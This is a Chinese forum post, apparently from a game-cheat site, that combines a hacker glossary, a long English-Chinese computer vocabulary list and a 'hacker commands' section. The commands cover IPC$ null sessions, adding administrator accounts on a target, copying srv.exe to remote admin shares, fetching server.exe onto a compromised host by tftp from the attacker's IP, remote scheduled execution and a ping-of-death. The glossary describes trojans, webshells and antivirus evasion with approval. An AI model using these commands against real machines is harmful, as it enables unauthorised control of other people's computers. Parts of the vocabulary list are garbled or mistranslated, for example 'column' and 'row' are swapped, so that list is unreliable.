|
|
1.黑客术语
1.肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。
2.木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是
热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。
3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
4.挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。
5.后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。
通常大多数的特洛伊木马(Trojan
Horse)程序都可以被入侵者用语制作后门(BackDoor)
6.rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。
7.IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
8.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)
9.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。
10.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell
11.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp
或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等
12.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。
13.注入:随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注意入。
14.注入点:是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。
15.内网:通俗的讲就是局域网,比如网吧,校园网,公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话,就说明我们是处于内网之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255
16.外网:直接连入INTERNET(互连网),可以与互连网上的任意一台电脑互相访问,IP地址不是保留IP(内网)IP地址。
17.端口:(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。
18.3389、4899肉鸡:3389是Windows终端服务(Terminal
Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使以也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。
19.免杀:就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。
20.加壳:就是利用特殊的酸法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如实现压缩、加密),以达到缩小文件体积或者加密程序编码,甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX,ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。
21.花指令:就是几句汇编指令,让汇编语句进行一些跳转,使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置,杀毒软件就找不到病毒了“。
shell
shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)
2.黑客最基本要掌握的英语
CPU(Center Processor Unit)中央处理单元
mainboard主板
RAM(random access
memory)随机存储器(内存)
ROM(Read Only Memory)只读存储器
Floppy Disk软盘
Hard
Disk硬盘
CD-ROM光盘驱动器(光驱)
install安装
monitor监视器
keyboard键盘
mouse鼠标
chip芯片
CD-R光盘刻录机
HUB集线器
Modem=
MOdulator-DEModulator,调制解调器
P-P(Plug and Play)即插即用
UPS(Uninterruptable Power Supply)不间断电源
BIOS(Basic-input-Output System)基本输入输出系统
CMOS(Complementary
Metal-Oxide-Semiconductor)互补金属氧化物半导体
setup安装
uninstall卸载
wizzard向导
OS(Operation Systrem)操作系统
OA(Office AutoMation)办公自动化
exit退出
edit编辑
copy复制
cut剪切
paste粘贴
delete删除
select选择
find查找
select all全选
replace替换
undo撤消
redo重做
program程序
license许可(证)
back前一步
next下一步
finish结束
folder文件夹
Destination Folder目的文件夹
user用户
click点击
double click双击
right click右击
settings设置
update更新
release发布
data数据
data base数据库
DBMS(Data Base Manege System)数据库管理系统
view视图
insert插入
object对象
configuration配置
command命令
document文档
POST(power-on-self-test)电源自检程序
cursor光标
attribute属性
icon图标
service pack服务补丁
option pack功能补丁
Demo演示
short cut快捷方式
exception异常
debug调试
previous前一个
column行
row列
restart重新启动
text文本
font字体
size大小
scale比例
interface界面
function函数
access访问
manual指南
active激活
computer language计算机语言
menu菜单
GUI(graphical user interfaces )图形用户界面
template模版
page setup页面设置
password口令
code密码
print preview打印预览
zoom in放大
zoom out缩小
pan漫游
cruise漫游
ful l screen全屏
tool bar工具条
status bar状态条
ruler标尺
table表
paragraph段落
symbol符号
style风格
execute执行
graphics图形
image图像
Unix用于服务器的一种操作系统
Mac OS苹果公司开发的操作系统
OO(Object-Oriented)面向对象
virus病毒
file文件
open打开
colse关闭
new新建
save保存
exit退出
clear清除
default默认
LAN局域网
WAN广域网
Client/Server客户机/服务器
ATM( Asynchronous Transfer Mode)异步传输模式
Windows
NT微软公司的网络操作系统
Internet互联网
WWW(World Wide Web)万维网
protocol协议
HTTP超文本传输协议
FTP文件传输协议
Browser浏览器
homepage主页
Webpage网页
website网站
URL在Internet的WWW服务程序上
用于指定信息位置的表示方法
Online在线
Email电子邮件
ICQ网上寻呼
Firewall防火墙
Gateway网关
HTML超文本标识语言
hypertext超文本
hyperlink超级链接
IP(Address)互联网协议(地址)
Search Engine搜索引擎
TCP/IP用于网络的一组通讯协议
Telnet远程登录
IE(Internet Explorer)探索者(微软公司的网络浏览器)
Navigator引航者(网景公司的浏览器)
multimedia多媒体
ISO国际标准化组织
ANSI美国国家标准协会
able 能
active file
活动文件
add watch 添加监视点
allf iles 所有文件
all rights reserved 所有的权力保留
altdirlst 切换目录格式
and fix a much wider range of disk problems
并能够解决更大范围内的磁盘问题
and other inFORMation 以及其它的信息
archive file attribute
归档文件属性
assignto 指定到
auto answer 自动应答
auto detect 自动检测
auto indent 自动缩进
auto save 自动存储
avail able onvolume 该盘剩余空间
bad command 命令错
bad command or file name 命令或文件名错
batch parameters
批处理参数
binary file 二进制文件
binary files 二进制文件
International companies国际公司
Under the blank page页下空白
by date 按日期
by extension 按扩展名
by name 按名称
by tesfree 字节空闲
call stack 调用栈
case-insensitive 区分大小写
Software company shares 软件股份公司
change directory 更换目录
change drive 改变驱动器
change name 更改名称
characterset 字符集
checking for 正在检查
checks a disk and display a
status report 检查磁盘并显示一个状态报告
Change Disk / path改变盘/路径
china 中国
choose
one of the following 从下列中选一项
clean all 全部清除
clean all breakpoints
清除所有断点
clean attribute 清除属性
Removal Order history 清除命令历史
clean screen 清除屏幕
close all 关闭所有文件
code generation 代码生成
color palette 彩色调色板
The command line命令行
Command prompt命令提示符
compressed file 压缩文件
Hard disk configuration that used by MS-DOS
配置硬盘,以为 MS-DOS 所用
Conventional memory常规内存
Copy directory and subdirectories, empty except 拷贝目录和子目录,空的除外
Set up a copy of a document archiving attributes 拷贝设置了归档属性的文件
Copying files or moving to another place把文件拷贝或搬移至另一地方
To copy the contents of a floppy disk to another disk
把一个软盘的内容拷贝到另一个软盘上
Copy Disk复制磁盘
copyrightc 版权
Create Logical DOS
district or DOS actuator创建DOS分区或逻辑DOS驱动器
Create DOS district
expansion创建扩展DOS分区
The expansion DOS partitions to create logical DOS drives
在扩展DOS分区中创建逻辑DOS驱动器
Create DOS Main district 创建DOS主分区
Create a directory 创建一个目录
To create, change or delete disk
label创建,改变或删除磁盘的卷标
the current file 当前文件
Current drives 当前硬盘驱动器
current settings 当前设置
current time 当前时间
The cursor position光标位置
defrag 整理碎片
dele 删去
Logical DOS or delete Division actuator
删除分区或逻辑DOS驱动器
deltree 删除树
device driver 设备驱动程序
Dialogue column对话栏
direction keys 方向键
directly 直接地
dContents variables that目录显示变量
Directory Structure目录结构
disk access 磁盘存取
disk copy 磁盘拷贝
disk space 磁盘空间
That document 显示文件
display options 显示选项
That geographical information 显示分区信息
That specified directory and all subdirectories documents
显示指定目录和所有目录下的文件
The document specified that attribute显示指定属性的文件
Show or change file a ttributes 显示或改变文件属性
That date or equipment
显示或设备日期
Rather than a
monochromatic color display screen installation information 以单色而非彩色显示安装屏信息
That system has been used and unused amount of memory
显示系统中已用和未用的内存数量
All documents on the disk that the full path and
name显示磁盘上所有文件的完整路径和名称
Show or change the current directory 显示或改变当前目录
doctor 医生
doesn 不
doesnt change the attribute 不要改变属性
dosshell DOS 外壳
doubleclick 双击
You want that information? Logical
drive (y / n)?你想显示逻辑驱动器信息吗(y/n)?
driveletter 驱动器名
editmenu 编辑选单
Memory内存
end of file 文件尾
end of line 行尾
enter choice 输入选择
entire disk 转换磁盘
environment variable 环境变量
All the documents and subdirectories所有的文件和子目录
The directory has been in existence documents已存在的目录文件时
expanded memory 扩充内存
expand tabs 扩充标签
explicitly 明确地
extended memory 扩展内存
fastest 最快的
file system文件系统
fdis koptions
fdisk选项
file attributes 文件属性
file FORMat 文件格式
file functions 文件功能
files election 文件选择
Documents choice variables文件选择变元
file sin 文件在
file sinsubdir 子目录中文件
file slisted 列出文件
file spec 文件说明
file
specification 文件标识
files selected 选中文件
find file 文件查寻
fixed disk 硬盘
fixed disk setup program 硬盘安装程序
fixes errors on the disk 解决磁盘错误
floppy disk 软盘
FORMat disk格式化磁盘
FORMats a disk for use with ms-dos
格式化用于MS-DOS的磁盘
FORM feed 进纸
free memory 闲置内存
full screen 全屏幕
function procedure 函数过程
graphical 图解的
graphics library 图形库
group
directories first 先显示目录组
hang up 挂断
hard disk 硬盘
hardware
detection 硬件检测
has been 已经
help file 帮助文件
help index 帮助索引
help
in FORM ation 帮助信息
help path 帮助路径
help screen 帮助屏
help text 帮助说明
help topics 帮助主题
help window 帮助窗口
hidden file 隐含文件
hidden file
attribute 隐含文件属性
hidden files 隐含文件
how to 操作方式
ignore case 忽略大小写
in both conventional and upper memory 在常规和上位内存
incorrect dos 不正确的DOS
incorrect dos version DOS 版本不正确
indicatesa binary file 表示是一个二进制文件
indicatesan ascii text file 表示是一个ascii文本文件
insert mode 插入方式
inuse
在使用
invalid directory 无效的目录
is 是
kbytes 千字节
keyboard type 键盘类型
label disk 标注磁盘
lap top 膝上
The largest executable 最大可执行程序
The
largest available memory block最大内存块可用
left handed 左手习惯
left margin 左边界
line number 行号
line numbers 行号
line spacing 行间距
The document
specified that the order按指定顺序显示文件
listfile 列表文件
listof 清单
Position
papers 文件定位
look at 查看
look up 查找
macro name 宏名字
make directory
创建目录
memory info 内存信息
memory model 内存模式
menu bar 菜单条
menu
command 菜单命令
menus 菜单
message window 信息窗口
microsoft 微软
microsoft antivirus 微软反病毒软件
microsoft corporation 微软公司
mini 小的
modem setup 调制解调器安装
module name 模块名
monitor mode 监控状态
Monochrome monitors 单色监视器
move to 移至
multi 多
new data 新建数据
newer 更新的
new file 新文件
new name 新名称
new window 新建窗口
norton norton
nostack 栈未定义
Note: careless use deltree 注意:小心使用deltree
online help 联机求助
optionally 可选择地
or 或
page frame 页面
page
length 页长
Every screen displayed information about suspended after
在显示每屏信息后暂停一下
pctools pc工具
postscript 附言
prefix meaning not 前缀意即\"不
prefix to rever seorder 反向显示的前缀
Prefixes used on a short horizontal line
and - after the switch (for example /-w) preset switch用前缀和放在短横线-后的开关(例如/-w)预置开关
press a key toresume 按一键继续
press any key for file functions 敲任意键执行文件功能
press enter to keep the same date 敲回车以保持相同的日期
press enter to keep thes
ame time 敲回车以保持相同的时间
press esc tocontinue 敲esc继续
press esc to exit
敲键退出
press esc to exit fdisk 敲esc退出fdisk
press esc to return
to fdisk options 敲esc返回fdisk选项
previously 在以前
print all 全部打印
print
device 打印设备
print erport 打印机端口
processesfilesinalldirectoriesinthespecifiedpath 在指定的路径下处理所有目录下的文件
program file 程序文件
program ming environment 程序设计环境
Each goal in the
creation of documents remind you 在创建每个目标文件时提醒你
promptsy outo press a key
before copying 在拷贝前提示你敲一下键
pull down 下拉
pull downmenus 下拉式选单
quick
FORMat 快速格式化
quick view 快速查看
read only file 只读文件
read only file
attribute 只读文件属性
read only files 只读文件
read only mode 只读方式
redial 重拨
repeat last find 重复上次查找
report bfile 报表文件
resize 调整大小
respectively 分别地
rightmargin 右边距
rootdirectory 根目录
Running
debug, it is a testing and editing tools 运行debug, 它是一个测试和编辑工具
run time error
运行时出错
save all 全部保存
saveas 另存为
scan disk 磁盘扫描程序
screen colors
屏幕色彩
screen options 屏幕任选项
screen saver 屏幕暂存器
screen savers 屏幕保护程序
screen size 屏幕大小
scroll bars 翻卷栏
scroll lock off 滚屏已锁定
search
for 搜索
sector spertrack 每道扇区数
selectgroup 选定组
selectionbar 选择栏
setactivepartition 设置活动分区
setupoptions 安装选项
shortcutkeys 快捷键
showclipboard 显示剪贴板
singleside 单面
size move 大小/移动
sort help
S排序H帮助
sortorder 顺序
Special services: D directory maintenance特殊服务功能:
D目录维护
List of designated to drive, directory, and documents 指定要列出的驱动器,目录,和文件
Designated you want to parent directory as the current directory
指定你想把父目录作为当前目录
The new document specified directory or file name指定新文件的目录或文件名
Copies of the document to designated 指定要拷贝的文件
stack over flow 栈溢出
stand alone 独立的
startu poptions 启动选项
statu sline 状态行
stepover 单步
summaryof 摘要信息
Cancellation confirmed suggest that you would like to
cover 取消确认提示,在你想覆盖一个
swapfile 交换文件
Switches can be installed in the
environment variable dircmd开关可在dircmd环境变量中设置
switch to 切换到
sync 同步
system file 系统文件
system files 系统文件
system info 系统信息
system in FORM ation 系统信息程序
table of contents 目录
terminal emulation 终端仿真
terminal settings 终端设置
test file 测试文件
test file para meters 测试文件参数
the active window 激活窗口
Switches can
copycmd preset environment variables开关可以在copycmd环境变量中预置
the two floppy disks
must be the same type 两个软磁盘必须是同种类型的
this may be over ridden with y on the
commandline 在命令行输入/-y可以使之无效
toggle reakpoint 切换断点
toms dos 转到MS-DOS
topm argin 页面顶栏
turn off 关闭
Type cd drives: designated driver that
the current directory 键入cd驱动器:显示指定驱动器的当前目录
Type cd without parameters of the
current drive to show the current directory键入无参数的cd以显示当前驱动器的当前目录
The date
and type of parameters that the current date set键入无参数的date,显示当前日期设置
unmark
取消标记
unse lect 取消选择
uses bare FORMat 使用简洁方式
uses lower case 使用小写
uses widelist FORMat 使用宽行显示
using help 使用帮助
verbosely 冗长地
verifies that new file sare writ tencorrectly 校验新文件是否正确写入了
video mode
显示方式
view window 内容浏览
viruses 病毒
vision 景象
vollabel 卷标
volumelabel 卷标
volume serial number is 卷序号是
windows help windows 帮助
wordwrap 整字换行
working directory 正在工作的目录
worm 蠕虫
write mode 写方式
write to 写到
xmsmemory 扩充内存
you may
你可以
我把网络安全方面的专业词汇整理了一下,虽然大多是乱谈,但初衷在于初学者能更好的了解这些词汇。不全和错误的地方还望高手补充:
Access
Control List(ACL) 访问控制列表
access token 访问令牌
account lockout 帐号封锁
account policies 记帐策略
accounts 帐号
adapter 适配器
adaptive speed
leveling 自适应速率等级调整
Address Resolution Protocol(ARP) 地址解析协议
Administrator
account 管理员帐号
ARPANET 阿帕网(internet的前身)
algorithm 算法
alias 别名
allocation 分配、定位
alias 小应用程序
allocation layer 应用层
API 应用程序编程接口
anlpasswd 一种与Passwd+相似的代理密码检查器
applications 应用程序
ATM 异步传递模式
attack 攻击
audio policy 审记策略
auditing 审记、监察
back-end 后端
borde
边界
borde gateway 边界网关
breakabie 可破密的
breach 攻破、违反
cipher 密码
ciphertext 密文
CAlass A domain A类域
CAlass B domain B类域
CAlass C
domain C类域
classless addressing 无类地址分配
cleartext 明文
CSNW Netware客户服务
client 客户,客户机
client/server 客户机/服务器
code 代码
COM port COM口(通信端口)
CIX 服务提供者
computer name 计算机名
crack 闯入
cryptanalysis 密码分析
DLC
数据链路控制
decryption 解密
data base 数据库
dafault route 缺省路由
dafault
share 缺省共享
denial of service 拒绝服务
dictionary attack 字典式攻击
directory
目录
directory replication 目录复制
domain 域
domain controller 域名控制器
domain name 域名
域名其实就是入网计算机的名字,它的作用就象寄信需要写明人们的名字、地址一样重
要。域名结构如下:计算机主机名.机构名.网络名.最高层域名。域名用文字表达,比
用数字表达的IP地址容易记忆。加入Internet的各级网络依照DNS的命名规则对本网内
的计算机命名,并负责完成通讯时域名到IP地址的转换 。
DNS 域名服务器
DNS(Domain Name System,域名系统)是指在 Internet上查询域名或IP地址的目录服务系
统。在接收到请求时,它可将另一台主机的域名翻译为IP地址,或反之。大部分域名系
统都维护着一个大型的数据库,它描述了域名与
IP地址的对应关系,并且这个数据库被
定期地更新。翻译请求通常来自网络上的另一台计算机,它需要IP地址以便进行路由选择。
DDE 动态数据交换
DHCP 动态主机配置协议
shell
shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)
root
Unix里最高权限的用户,也就是超级管理员。
admin windows
NT,2K,XP里最高权限的用户,也就是超级管理员。
rootshell
通过一个溢出程序,在主机溢出一个具有root权限的shell。
exploit
溢出程序。exploit里通常包含一些shellcode。
shellcode
溢出攻击要调用的API函数,溢出后要有一个交换式界面进行操作。所以说就有了shellcode。
Acces Control list(ACL)
访问控制列表。
Address Resolution Protocol(ARP) 地址解析协议。
Administrator account
管理员帐号。
ARPANET 阿帕网(internet的前称)
access token 访问令牌。
adaptive speed
leveling 自适应速度等级调整。
algorithm 算法 alias 别名
anlpasswd 一种与PASSWD
+相似的代理密码检查器。
applications 应用程序 ATM 异步传递模式
account lockout
帐号封锁。
account policies 记帐策略。
accounts 帐号。
adapter 适配器。
什么是端口
端口(PORT)相当于一种数据的传输通道.用语接受某些数据,然后传送相应的服务,而电脑将这些数据处理后,再将响应的恢复通过开启的端口传送给对方.
什么是SHELL?简单的说,SHELL就是一个命令解释器,它的作用就是遵循一定的语法将我么输入的命令加以解释并传给系统,它为用户提供了一个向操作系统发送请求以便运行程序的借口系统程序,用户可以用SHELL来启动,挂起,停止,甚至是编写一些程序/.
什么是TCP/IP
是一种网络通信协议,他规范了网络上所有的通信设备,尤其是一个主机与另一个主机之间的数据往来格式以及传送方式.,TCP/IP是INTERNET的基础协议,也是一种电脑数据打包和寻址的标准方法.在数据传诵中,可以形象地理解为两个信封,TCP和IP就像是信封,要传递的信息被划为若干段,每一段塞入一个TCP信封,并在该信封面上记录有分段号的信息,再将TCP信封塞入IP大信封,发送上网.
什么是路由器
路由器应该是在网络上使用最高的设备之一了,它的主要作用就是路由选路,将IP数据包正确的送到目的地,因此也叫IP路由器.
什么是蜜罐
好比是情报收集系统.蜜罐好象是故意让人攻击的目标,引诱黑客来攻击,所有攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对你的服务器发动的最新的攻击和漏洞.还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络.
什么是拒绝服务攻击
DOS是DENIAL OF
SERVICE的简称,即拒绝服务,造成DOS的攻击行为被称为DOS攻击,其目的是使计算机或网络无法正常服务,最常见的DOS攻击有计算机网络宽带攻击和连通性攻击,连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源被消耗,最终计算机无法再处理合法用户的请求.
什么是脚本注入攻击(SQL
INJECTION)
所谓脚本注入攻击者把SQL命令插入到WEB表单的输入域或也面请求的查学字符串,欺骗服务器执行恶意的SQL命令,在某些表单中,用户输入的内容直接用来构造动态的SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击
.:
3.黑客指令
ipconfig /all
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use
\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名"
直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$
/del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add
建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net
user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add
把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数
net start 查看开启了哪些服务
net
start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名
停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set
设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net
view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff
断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver
局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$
开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del
删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码
更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n
查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名
例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s
查看正在使用的所有协议使用情况
nbtsta* -* **
对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数
ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名)
向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l
65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名
加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名
加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR
*.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录
或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q
可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名
移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt
对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号
开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete
停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r
在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口
远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet
将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y
复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\***$
复制本地c:\srv.exe到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy
\\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.*
复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名
复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe
c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe
参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put
c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口
用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route
print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway
addres,接口地址Inte***ce
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp
-a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem
查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R
+S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir
查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、
time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set
指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符)
显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if
在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签
将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名
从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for
对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off
打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >>
pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
|
|
|
|
|
温馨提示:为了保护系统安全,使用辅助前,请务必使用影子系统。
|
[复制链接]
|小黑屋|我爱辅助
( 辽ICP备19006053号-1 )
雷达卡
发表于 2011-11-10 09:14:19
提升卡
沉默卡
喧嚣卡
变色卡
显身卡
